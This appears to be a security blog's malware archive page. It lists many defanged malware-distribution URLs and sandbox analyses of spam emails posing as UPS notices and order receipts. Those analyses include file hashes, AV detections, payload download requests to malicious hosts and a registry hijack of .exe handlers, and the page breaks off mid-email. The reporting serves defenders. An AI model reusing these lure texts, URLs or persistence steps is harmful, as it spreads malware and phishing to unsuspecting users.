Tag Archives: malware

Recent Malware URLs captured by NoVirusThanks Sandbox

These URLs are malicious or related to malware:

hxxp://caperiod.com/pxxko/ndrei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/wjwjwaobfs.php?adv=adv401&id=1626783411&c=203332757
hxxp://getpersgd09.com/persgd09/setup.php?track_id=30046
hxxp://gopersgd09.com/install/?track_id=30046
hxxp://carefinder.com.au/inf.php
hxxp://scr4zy.webcindario.com/2/infects.php
hxxp://elmejorbonche.com/dns
hxxp://photopath.in/8797hkj9jk9j778kj9h78k9jh.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://www.easyenco.co.kr/module/program/media_codec.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=media_codec.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=media_codec.exe
hxxp://c0re.su/panel/config.bin
hxxp://ck4.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://201.25.28.9/mail/images/info.php
hxxp://startfaredata.in/o54p6ipo546ipo6.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://tecnp.h19.ru/in.php
hxxp://www.cplnn.com/bbcount.php?action=knock&build=sp1
hxxp://www.cplnn.com/wad/init3.php?build=
hxxp://mmm-2011.co.uk/setup2683.exe
hxxp://mmm-2011.co.uk/ka.exe
hxxp://cekcuc.ru/z/kilka.bin
hxxp://up1.free-sms.co.kr/main/free07/smsupsetting.dat
hxxp://up1.free-sms.co.kr/main/free07/smsins.exe
hxxp://up1.free-sms.co.kr/main/free07/smsdat.dat
hxxp://up1.free-sms.co.kr/upapp/free07/eventex.exe
hxxp://free-sms.co.kr/app_count/install_count.php?&pid=free07&mac=%MAC%
hxxp://up1.free-sms.co.kr/main/free07/free-sms.exe
hxxp://up1.free-sms.co.kr/main/free07/uninst.exe
hxxp://up1.free-sms.co.kr/main/free07/free-sms.ico
hxxp://up1.free-sms.co.kr/main/free07/smsupv.exe
hxxp://ppppnipponp.r7m.us/cgi-bin/p.cgi
hxxp://flashpile.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHy
hxxp://neframeofwork.com/gud/hig.op
hxxp://ad.ring3.info/Config.asp
hxxp://ad.ring3.info/Count/Count.asp
hxxp://www.bbsv.nl/files/cache/.../contador.php
hxxp://firstresour.web135.discountasp.net/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=aolsbm&v=1&hardid=%HDID%&id=0
hxxp://blognote.by/f/fn.txt
hxxp://www.caesar.sk/downloads/getc/getc.php
hxxp://114.200.199.251/apsuy.php
hxxp://iring4u.co.kr/bcklist.php
hxxp://ad79.co.kr/prex/newb/apsuo.exe
hxxp://114.200.199.251/b5ains.php?mac=%MAC%&ip=%LANIP%&pid=&setup=1
hxxp://114.200.199.251/b5aliveins.php?mac=%MAC%&ip=%LANIP%&pid=&app=
hxxp://caperiod.com/pxxko/iwwnnrvi.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/klppp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/sftkxkb.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/cpptuxlpc.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/oyppct.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/obcptx.php?adv=adv401&id=1626783411&c=203332757
hxxp://gamafotolembranca.com.br/masters/byte.gif
hxxp://gamafotolembranca.com.br/masters/mega.gif
hxxp://gamafotolembranca.com.br/masters/tera.gif
hxxp://www.basedeclientes.com.br/versao_px.txt
hxxp://myck.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://celinhaz.sites.uol.com.br/autor2.jpg
hxxp://www.avisosbaladabelemhh.com.br/files/j1/inf/arq.php
hxxp://caperiod.com/pxxko/xxobo.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/pcppgk.php?adv=adv401&id=1626783411&c=203332757
hxxp://webmail.imicro.com.br/SQL/cashkey.gif
hxxp://searcham.org/404.php?type=stats&affid=527&subid=02&iruns
hxxp://w.nucleardiscover.com:888/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B&v=2&t=0,5870172
hxxp://ru.coolnuff.com:2011/myck.jpg?t=0,1209528
hxxp://w.nucleardiscover.com:888/sn.php?c=C1DF13F78111F6528E63540E077DCF0C0&t=0,8235895
hxxp://w.nucleardiscover.com:888/sn.php?c=4D535BBF44D4BC186F82F8A2A1DB468528B&t=0,2664606
hxxp://58.150.174.222/baz001.jpg?t=0,4474756
hxxp://w.nucleardiscover.com:888/sn.php?c=B9A76E8AC252E133E3FEAAF11C54E417E770B&t=0,1963922
hxxp://w.nucleardiscover.com:888/sn.php?c=9D83997D1A8A28FA809D6239A9E1FF0CAB3C0&t=0,1260797
hxxp://searchattention.org/404.php?type=stats&affid=531&subid=01&iruns
hxxp://www.easyenco.co.kr/module/program/nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=nvsvc32.exe
hxxp://caperiod.com/pxxko/jjnaeei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gqquulypp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JNN0&code2=5103
hxxp://www.ilonexs.de/envio/gds32.dll
hxxp://www.familiennavigator.de/components/com_kunena/template/igt.php
hxxp://qd6170.91mt.com/asp/xg.asp
hxxp://qd6170.91mt.com/exe/key2/key_0605.exe
hxxp://key.91mt.com/newkey.php
hxxp://rh508.91mt.com/tj.asp?id=1
hxxp://ups.1gb.ru/services6.exe
hxxp://ekobit.com.pl/cls/Output.exe
hxxp://xn.bisque110.com/yt.php
hxxp://xn.bisque110.com/lf
hxxp://122.770304123.cn/1.gif
hxxp://122.770304123.cn/ue000/38sw.e?uid=162678341112952317322438
hxxp://110.770304123.cn/1.gif
hxxp://110.770304123.cn/player/blog.updata?v=1.1.8.1&r1=0009a83babc21d46591d009e616da91a&tm=2011-06-12%2003:55:28&os=Windows%20XP.2600%20with%20Service%20Pack%202&uid=002678341112952317328300&cht=0
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=GO00&code2=0200&id=102678
hxxp://coursu.com/admin22/server[php]/config.bin
hxxp://ad79.co.kr/fie/sningal.exe
hxxp://114.200.199.251/fie/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/fie/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://iring4u.co.kr/favorbutton.php
hxxp://face-herault.org/images/ads/info.php
hxxp://lkrgn.ivepointedya.com/webyx/settings.cfg?build=501&os=XP
hxxp://network.emloud.com/webyx/iLog.php?dl=5.0&log=Loader%205.0%20~%20Ran
hxxp://consolewaspogad.com/czl/zlo.cl
hxxp://icvaircl.cn/dll/44.dll
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=2
hxxp://icvaircl.cn/update.db
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=4
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=9
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=11
hxxp://xylahavowi.com/1023000112
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOM0&code2=4203
hxxp://jennifermusic.nl/logo2.jpg
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOP0&code2=7203
hxxp://fastsearchportal.org/cfg/miniav.psd
hxxp://fastsearchportal.org/cfg/stopav.psd
hxxp://fastsearchportal.org/cfg/passw.psd
hxxp://fastsearchportal.org/pyvcu.php3
hxxp://fastsearchportal.org/ungtsmsuopstfsjjxaqhpksdi.phtml
hxxp://fastsearchportal.org/mccmkbawzojuijhsyttn.inc
hxxp://fastsearchportal.org/onqyofrbc.phtm
hxxp://myavava.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHyF2e
hxxp://clashjamwallop.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrO
hxxp://adordota.com/bandwidth.bin
hxxp://einemenge.info/webpanel/alive.php?key=grills22&pcuser=%PCUSER%&pcname=%PCNAME%&hwid=%HWID%&country=Italy
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=KOR0&code2=9204
hxxp://JOSEMORAISTA.net/Machine.jpg
hxxp://JOSEMORAISTA.net/andeikyu.jpg
hxxp://mariadacoceicaopraxedes.net/GetString.aspx
hxxp://mariadacoceicaopraxedes.net/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612045029
hxxp://mariadacoceicaopraxedes.net/COMCTL32.OCA.zip
hxxp://s350098374.onlinehome.us/mys.ini
hxxp://rmhpzusmfhtpnt.biz/news/?s=167674
hxxp://axvkxnuutylqdtu.com/news/?s=90742
hxxp://outoszjfvqtyonk.net/news/?s=24872
hxxp://114.200.199.251/vanir.php
hxxp://114.200.199.251/b7ins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&setup=1
hxxp://114.200.199.251/b7liveins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&app=
hxxp://privatesystem-softshieldprotect.com/favicon.ico?0=78&1=4&2=2&3=80&4=i-s
hxxp://212.150.164.204/flash/flashplayer.jpg
hxxp://www.increasingly.kr/Module/gomserv.exe
hxxp://www.increasingly.kr/Module/count.html?exec=gomserv.exe&instFile=gomserv.exe
hxxp://www.increasingly.kr/Module/count_live.html?exec=gomserv.exe
hxxp://windoslive.hotmail.ru/090043043543034877799.exe
hxxp://searchbehind.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://mygateforex.co.za/.sys.php?action=fbgen&v=1
hxxp://richardwiggers.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=0
hxxp://rvl.it/.sys.php?action=fbgen&v=1
hxxp://www.irishpub.fo/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=1
hxxp://slcsc.co.uk/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=2
hxxp://robertjakobsen.com/.sys.php?action=fbgen&v=1
hxxp://crosslinkhk.com/.sys.php?action=fbgen&v=1
hxxp://skybluephoto.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=3
hxxp://www.crabapplesound.com/.sys.php?action=fbgen&v=1
hxxp://www.crabapplesound.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=4
hxxp://kidnet.co.il/.sys.php?action=fbgen&v=1
hxxp://gulko.co.za/.sys.php?action=fbgen&v=1
hxxp://shieldteens.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=5
hxxp://pflco.com/.sys.php?action=fbgen&v=1
hxxp://pflco.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=6
hxxp://my-mobility.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=7
hxxp://emergencyshelter.us/.sys.php?action=fbgen&v=1
hxxp://emergencyshelter.us/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=8
hxxp://www.aandedoorns.co.za/.sys.php?action=fbgen&v=1
hxxp://ad79.co.kr/prex/taurus/taurus.exe
hxxp://ad79.co.kr/dico/sDico.exe
hxxp://ad79.co.kr/prex/taurus/staurus.exe
hxxp://114.200.199.251/version2.php
hxxp://114.200.199.251/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=taurus&install=1
hxxp://iring4u.co.kr/dico/dico.php
hxxp://iring4u.co.kr/dico/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/liveins.php?mac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://iring4u.co.kr/dico/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://pc-guarrantor-utility.com/favicon.ico?0=80&1660=0&2=1&3000=82&4000=i-s
hxxp://key.91mt.com/diykey.php
hxxp://limpidoscomercio.com.br/GetString.aspx
hxxp://limpidoscomercio.com.br/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612141104
hxxp://limpidoscomercio.com.br/COMCTL32.OCA.zip
hxxp://limpidoscomercio.com.br/COMCTL32.OCX.zip
hxxp://petchaburi.kr/kwd/hkwd.php
hxxp://petchaburi.kr/kwd/dkwd.php
hxxp://petchaburi.kr/check/check.php?m=b
hxxp://64.31.58.237/brn.txt
hxxp://64.31.58.237/brn.php
hxxp://key.91mt.com/list/getpmnum.asp?id=f9435d25636a746f
hxxp://key.91mt.com/list/getpmnum2.asp?id=f9435d25636a746f
hxxp://114.200.199.251/ngliveins.php?pmac=0&lmac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://www.hyap98.com/123/mh.txt
hxxp://www.hyap98.com/123/rx.txt
hxxp://www.hyap98.com/123/wc.txt
hxxp://www.hyap98.com/123/wm.txt
hxxp://www.hyap98.com/123/wow.txt
hxxp://w.nucleardiscover.com:888/sn.php?c=DCC228CCD04021858368C8936B1023D74A8&t=9,005374E-02
hxxp://w.nucleardiscover.com:888/sn.php?c=18064AAE3FAF34908C67CC976A11E317&t=0,3627588
hxxp://searcham.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://s350098374.onlinehome.us/update.php
hxxp://key.91mt.com/list/getpmnum.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum2.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/clickpm.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum.asp?id=fa67a8111002230d
hxxp://key.91mt.com/list/getpmnum2.asp?id=fa67a8111002230d
hxxp://98.158.182.229/~milhomem/ver.txt?20110612154053
hxxp://ck3.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://w.nucleardiscover.com:888/sn.php?c=948A7D999D0D9733C5285903F882FB388219AB9DA&t=0,894787
hxxp://w.nucleardiscover.com:888/sn.php?c=E1FF76924BDB00A47B96A8F2F18B995A4AD1A593F&t=0,5531122
hxxp://58.150.174.222/baz001.jpg?t=0,8852045
hxxp://131207db062d.dynazzy.net/get2.php?c=TCBIJIJK&d=26606B67393437333F2F676268307D3F22202323
hxxp://w.nucleardiscover.com:888/sn.php?c=4E5018FC71E12DFFD2CFCA91DB93&t=0,2665522
hxxp://w.nucleardiscover.com:888/sn.php?c=1F01DE3AC95905D70C11B&t=0,5650751
hxxp://ru.coolnuff.com:2011/ck3.jpg?t=0,4463007
hxxp://w.nucleardiscover.com:888/sn.php?c=3B25E90DC1513CEEB45CC6EB96EEC230&t=0,7814447
hxxp://w.nucleardiscover.com:888/sn.php?c=918FA94D78E873A13CD4E5C8502&t=0,8195307
hxxp://ru.coolnuff.com:2011/ck4.jpg?t=0,3862421
hxxp://w.nucleardiscover.com:888/sn.php?c=F8E65FBB45D53793A54EFCA7C5BEEB&t=0,3606684
hxxp://xylahavowi.com/1023000112
hxxp://tekefihamib.com/10230001124255461742
hxxp://tekefihamib.com/buy.html

URLVoid domain analysis:

http://www.urlvoid.com/scan/caperiod.com
http://www.urlvoid.com/scan/getpersgd09.com
http://www.urlvoid.com/scan/gopersgd09.com
http://www.urlvoid.com/scan/carefinder.com.au
http://www.urlvoid.com/scan/scr4zy.webcindario.com
http://www.urlvoid.com/scan/elmejorbonche.com
http://www.urlvoid.com/scan/photopath.in
http://www.urlvoid.com/scan/easyenco.co.kr
http://www.urlvoid.com/scan/c0re.su
http://www.urlvoid.com/scan/ck4.nucleardiscover.com
http://www.urlvoid.com/scan/201.25.28.9
http://www.urlvoid.com/scan/startfaredata.in
http://www.urlvoid.com/scan/tecnp.h19.ru
http://www.urlvoid.com/scan/cplnn.com
http://www.urlvoid.com/scan/mmm-2011.co.uk
http://www.urlvoid.com/scan/cekcuc.ru
http://www.urlvoid.com/scan/up1.free-sms.co.kr
http://www.urlvoid.com/scan/free-sms.co.kr
http://www.urlvoid.com/scan/ppppnipponp.r7m.us
http://www.urlvoid.com/scan/flashpile.in
http://www.urlvoid.com/scan/neframeofwork.com
http://www.urlvoid.com/scan/ad.ring3.info
http://www.urlvoid.com/scan/bbsv.nl
http://www.urlvoid.com/scan/firstresour.web135.discountasp.net
http://www.urlvoid.com/scan/shellybeachskiboatclub.co.za
http://www.urlvoid.com/scan/blognote.by
http://www.urlvoid.com/scan/caesar.sk
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/iring4u.co.kr
http://www.urlvoid.com/scan/ad79.co.kr
http://www.urlvoid.com/scan/gamafotolembranca.com.br
http://www.urlvoid.com/scan/basedeclientes.com.br
http://www.urlvoid.com/scan/myck.nucleardiscover.com
http://www.urlvoid.com/scan/celinhaz.sites.uol.com.br
http://www.urlvoid.com/scan/avisosbaladabelemhh.com.br
http://www.urlvoid.com/scan/webmail.imicro.com.br
http://www.urlvoid.com/scan/searcham.org
http://www.urlvoid.com/scan/w.nucleardiscover.com
http://www.urlvoid.com/scan/ru.coolnuff.com
http://www.ipvoid.com/scan/58.150.174.222
http://www.urlvoid.com/scan/searchattention.org
http://www.urlvoid.com/scan/ilonexs.de
http://www.urlvoid.com/scan/familiennavigator.de
http://www.urlvoid.com/scan/qd6170.91mt.com
http://www.urlvoid.com/scan/key.91mt.com
http://www.urlvoid.com/scan/rh508.91mt.com
http://www.urlvoid.com/scan/ups.1gb.ru
http://www.urlvoid.com/scan/ekobit.com.pl
http://www.urlvoid.com/scan/xn.bisque110.com
http://www.urlvoid.com/scan/122.770304123.cn
http://www.urlvoid.com/scan/110.770304123.cn
http://www.urlvoid.com/scan/coursu.com
http://www.urlvoid.com/scan/face-herault.org
http://www.urlvoid.com/scan/lkrgn.ivepointedya.com
http://www.urlvoid.com/scan/network.emloud.com
http://www.urlvoid.com/scan/consolewaspogad.com
http://www.urlvoid.com/scan/icvaircl.cn
http://www.urlvoid.com/scan/xylahavowi.com
http://www.urlvoid.com/scan/jennifermusic.nl
http://www.urlvoid.com/scan/fastsearchportal.org
http://www.urlvoid.com/scan/myavava.in
http://www.urlvoid.com/scan/clashjamwallop.in
http://www.urlvoid.com/scan/adordota.com
http://www.urlvoid.com/scan/einemenge.info
http://www.urlvoid.com/scan/JOSEMORAISTA.net
http://www.urlvoid.com/scan/mariadacoceicaopraxedes.net
http://www.ipvoid.com/scan/98.158.182.229
http://www.urlvoid.com/scan/s350098374.onlinehome.us
http://www.urlvoid.com/scan/rmhpzusmfhtpnt.biz
http://www.urlvoid.com/scan/axvkxnuutylqdtu.com
http://www.urlvoid.com/scan/outoszjfvqtyonk.net
http://www.urlvoid.com/scan/privatesystem-softshieldprotect.com
http://www.ipvoid.com/scan/212.150.164.204
http://www.urlvoid.com/scan/increasingly.kr
http://www.urlvoid.com/scan/windoslive.hotmail.ru
http://www.urlvoid.com/scan/searchbehind.org
http://www.urlvoid.com/scan/mygateforex.co.za
http://www.urlvoid.com/scan/richardwiggers.com
http://www.urlvoid.com/scan/obi-labs.com
http://www.urlvoid.com/scan/rvl.it
http://www.urlvoid.com/scan/irishpub.fo
http://www.urlvoid.com/scan/lets-exoticpets.co.za
http://www.urlvoid.com/scan/slcsc.co.uk
http://www.urlvoid.com/scan/voodoobarbcue.com
http://www.urlvoid.com/scan/robertjakobsen.com
http://www.urlvoid.com/scan/crosslinkhk.com
http://www.urlvoid.com/scan/skybluephoto.com
http://www.urlvoid.com/scan/3mates.com
http://www.urlvoid.com/scan/crabapplesound.com
http://www.urlvoid.com/scan/kidnet.co.il
http://www.urlvoid.com/scan/gulko.co.za
http://www.urlvoid.com/scan/shieldteens.co.za
http://www.urlvoid.com/scan/wcw.co.za
http://www.urlvoid.com/scan/pflco.com
http://www.urlvoid.com/scan/my-mobility.co.za
http://www.urlvoid.com/scan/emergencyshelter.us
http://www.urlvoid.com/scan/aandedoorns.co.za
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/pc-guarrantor-utility.com
http://www.urlvoid.com/scan/limpidoscomercio.com.br
http://www.urlvoid.com/scan/petchaburi.kr
http://www.ipvoid.com/scan/64.31.58.237
http://www.urlvoid.com/scan/hyap98.com
http://www.urlvoid.com/scan/ck3.nucleardiscover.com
http://www.urlvoid.com/scan/131207db062d.dynazzy.net
http://www.urlvoid.com/scan/tekefihamib.com

Malware: United Parcel Service notification #46034

Suspicious email spreading malware:

Return-Path: <info52943@ups.com>
Received: from [39.203.6.87] (account 1361@ms21.hinet.net HELO ybydypsmsb.cehflcrileuz.ru)
From: "United Parcel Service" <info52943@ups.com>
Subject: United Parcel Service notification #46034

Message:

May 2011United Parcel Servicetracking number #18203 Good morningParcel
notificationThe parcel was sent your home adress.And it will arrive within 3 
buisness days. More information and the parcel tracking number are attached in
document below.Thank you United Parcel Service of America (c)153 James Street,
Suite100, Long Beach CA, 90000

Attached there is a file with ZIP extension:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-zip
File size: 9032 bytes
MD5 hash: 4e8bbc81f8a1ed3fcde3899546fef0c9
SHA1 hash: 56e4f46e75cbccf27dde19289250471ebb90c5ba
Detection rate: 4 on 5 (80%)
Status: INFECTED

AVG 14/06/2011 10.0.0.1190 FakeAlert
Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
ClamAV 14/06/2011 0.97 Suspect.Bredozip-zippwd-10
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-exe
File size: 24576 bytes
MD5 hash: fed91182ed9d29e36bbabac211ac7d3a
SHA1 hash: 17f308da31c8d61dd0b33691bf474e6f6fb5afbe
Detection rate: 2 on 5 (40%)
Status: INFECTED

Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

Report created by NoVirusThanks Automated Sandbox:

Process Created - %SAMPLE% - C:\WINDOWS\system32\svchost.exe - Microsoft Corporation - 73955B04F209D8A1C633867841267A96 - 14336 bytes
File Deleted - C:\WINDOWS\system32\svchost.exe - %SAMPLE% - 24576 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /pusk3.exe
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\pusk3[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\OJZMJR51\pusk3[1].exe - 9A4DB26B24C1FA9F59D7005B18BF1B6E - 17408 bytes - attr: [] - -
Process Created - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\pusk3.exe - Microsoft Corporation - AFFF69E592B133B34B0FD2AB6AC67691 - 429056 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /trol.exe
Connection Established - %AppData%\IMPOST~1\Temp\pusk3.exe - TCP - 194.50.7.14 - 80
Web Request - %AppData%\IMPOST~1\Temp\pusk3.exe - GET - searcham.org - /404.php?type=stats&affid=531&subid=03&iruns
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\trol[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\trol[1].exe - 2984C3FF08E69000E841BF48436C55C9 - 66560 bytes - attr: [] - -
File Created - %AppData%\IMPOST~1\Temp\pusk3.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\WRLEMEZ4\404[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - 14/06/2011 11.46.01 - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\trol.exe - Unknown Publisher - F6C7505CC989D824EE2B6961F5EE1C2C - 79360 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 85.202.146.77 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - miliardov.com - /trol2.exe
File Modified - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\DX0O3V3I\trol2[1].exe
File Created - C:\WINDOWS\system32\svchost.exe - %UserProfile%\Impostazioni locali\Temporary Internet Files\Content.IE5\DX0O3V3I\trol2[1].exe - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes - attr: [] - PE
Process Created - C:\WINDOWS\system32\svchost.exe - %AppData%\IMPOST~1\Temp\trol2.exe - Unknown Publisher - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 95.64.36.67 - 80
File Created - %AppData%\IMPOST~1\Temp\trol2.exe - %Temp%\2.tmp - B088C688BFC85ACB12998CCB206C1705 - 84480 bytes - attr: [] - PE
Connection Established - %AppData%\IMPOST~1\Temp\trol2.exe - TCP - 94.60.123.33 - 80
Connection Established - %AppData%\IMPOST~1\Temp\trol2.exe - TCP - 94.60.123.34 - 80

URLVoid domain analysis:

http://www.urlvoid.com/scan/miliardov.com
http://www.urlvoid.com/scan/searcham.org

IPVoid ipaddress analysis:

http://www.ipvoid.com/scan/85.202.146.77
http://www.ipvoid.com/scan/194.50.7.14
http://www.ipvoid.com/scan/95.64.36.67
http://www.ipvoid.com/scan/94.60.123.33
http://www.ipvoid.com/scan/94.60.123.34

Malware: Your Order No 218538 – Puremobile Inc.

Suspicious email spreading malware:

Received: from 18714128077.user.veloxzone.com.br (unknown [187.14.128.77]) 
Received: from [132.75.231.74] (helo=qnmekzdssguat.bacphgvlbnez.ua)
From: "Puremobile Inc." <h5923a@ms2.hinet.net>
Subject: Your Order No 218538 - Puremobile Inc.

Message:

Thank you for ordering from Puremobile Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 372662.
 
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 045.00 USD and "Puremobile Inc." will
appear next to the charge on your statement.
Your purchase information appears below in the file.

Attached there is a file with ZIP extension:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-zip
File size: 7627 bytes
MD5 hash: d85180f7a74e04c9b9ef6f9bd437194d
SHA1 hash: 79763a8766773bc08f7dd309db2488f46d3f5438
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 01/05/2011 10.0.0.1190 FakeAlert
Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-exe
File size: 18432 bytes
MD5 hash: 694a38aa76e06cebe4048260b8f0e4fa
SHA1 hash: 0e698c044e77e11e2c494ad0b2dc002f6d73dabe
Detection rate: 2 on 6 (50%)
Status: INFECTED

Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The malware creates following files:

%AppData%\kdv.exe (BE39D725BDA9A76EAB2E0F1B3FAD8FA3)

Registry entries added:

HKCU\Software\Classes\.exe\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
 
HKCU\Software\Classes\exefile\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"

Network traffic:

GET /0014000126 HTTP/1.1
Host: hahecekis. com
 
GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/hahecekis.net
http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net

Malware: Successfull Order 386284

Another suspicious email spreading malware:

Received: from [246.236.108.228] (helo=waeztfotlyzjd.jxokxslnvzq.org)
From: " Bobijou Inc" <premierednxez86@expdel.com>
Subject: Successfull Order 386284
Return-Path: <premierednxez86@expdel.com>

Message:

Thank you for ordering from Bobijou Inc.

This message is to inform you that your order has been received and is currently
being processed.

